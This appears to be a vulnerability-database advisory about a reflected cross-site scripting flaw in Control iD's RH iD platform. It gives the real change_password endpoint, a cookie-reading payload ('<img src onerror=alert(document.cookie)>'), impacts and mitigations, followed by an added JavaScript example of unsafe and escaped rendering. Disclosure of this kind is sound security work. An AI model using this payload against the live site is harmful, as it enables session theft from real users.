| Title | Control iD RH iD v25.2.25.0 Cross-Site Scripting via API Response Manipulation |
|---|
| Description | Vendor: Control iD
Product: RH iD
A Cross-Site Scripting (XSS) vulnerability was identified in the Control iD platform. The issue arises from improper handling of API responses: a user-controlled string is reflected directly into the front-end without proper sanitization or output encoding.
Request:
POST /v2/customerdb/person.svc/change_password HTTP/2
Host: www.rhid.com.br
{"oldPassword":"Null'","newPassword":"teste123'"}
Response:
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
"Erro ao alterar a senha: senha anterior errada"
POC:
By intercepting the API response and modifying the `message` field, an attacker can inject JavaScript that executes on the client side when the front-end processes the response.
Malicious Response:
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
"<img src onerror=alert(document.cookie)>"
When this response is rendered on the web page, the JavaScript within the `message` field executes, leading to an XSS attack.
Impact:
- Theft of authentication cookies and session hijacking.
- Potential redirection to malicious websites.
- Defacement or unauthorized actions performed on behalf of the victim.
Mitigation:
- Implement proper output encoding before displaying any user-supplied data.
- Use a Content Security Policy (CSP) to restrict script execution.
- Sanitize API responses before rendering them in the front-end.
Classification:
- Type: Reflected XSS via API Response Manipulation
- CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') |
|---|
| Source | https://github.com/yago3008/cves |
|---|
| User | y4g0 (UID 80480) |
|---|
| Submission | 02/26/2025 21:03 (1 Year ago) |
|---|
| Moderation | 03/08/2025 15:47 (10 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 299037 [Control iD RH iD 25.2.25.0 API change_password Message cross site scripting] |
|---|
| Points | 20 |
|---|
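The rendering defect the description above attributes to the front-end, as an added example that is not the report's or the vendor's code: the unsafe and hardened ways a client can place an API message string into the page, using the response body quoted in the report as constructed sample input. The names `renderUnsafe`, `renderSafe`, `containsForeignTag` and `showMessage` are hypothetical.

```javascript
// Added example, not from the report or the vendor: contrasting how a
// front-end can render an API "message" string, with the report's payload
// as constructed sample input.

// HTML-escape the five characters that matter in text and attribute contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[ch]);
}

// Vulnerable pattern: the raw message is concatenated into markup that is
// later assigned to innerHTML, so a tag inside the message becomes live.
function renderUnsafe(message) {
  return `<div class="alert">${message}</div>`;
}

// Hardened pattern: identical markup, but the message is escaped first, so
// the browser shows the payload as literal text.
function renderSafe(message) {
  return `<div class="alert">${escapeHtml(message)}</div>`;
}

// Unit-test helper: markup built from untrusted text must contain no tag
// other than the <div> wrapper the renderer itself writes.
function containsForeignTag(html) {
  return /<(?!\/?div\b)[a-z!\/?]/i.test(html);
}

// Browser-side equivalent of renderSafe: textContent never parses the
// string as HTML, so no escaping step is needed at all.
function showMessage(el, message) {
  el.textContent = message; // never el.innerHTML = message
}

// Constructed sample: the body of the malicious response quoted in the report.
const SAMPLE_MESSAGE = "<img src onerror=alert(document.cookie)>";

console.log(renderUnsafe(SAMPLE_MESSAGE)); // <img ...> survives: XSS on innerHTML
console.log(renderSafe(SAMPLE_MESSAGE));   // &lt;img ...&gt;: inert text
```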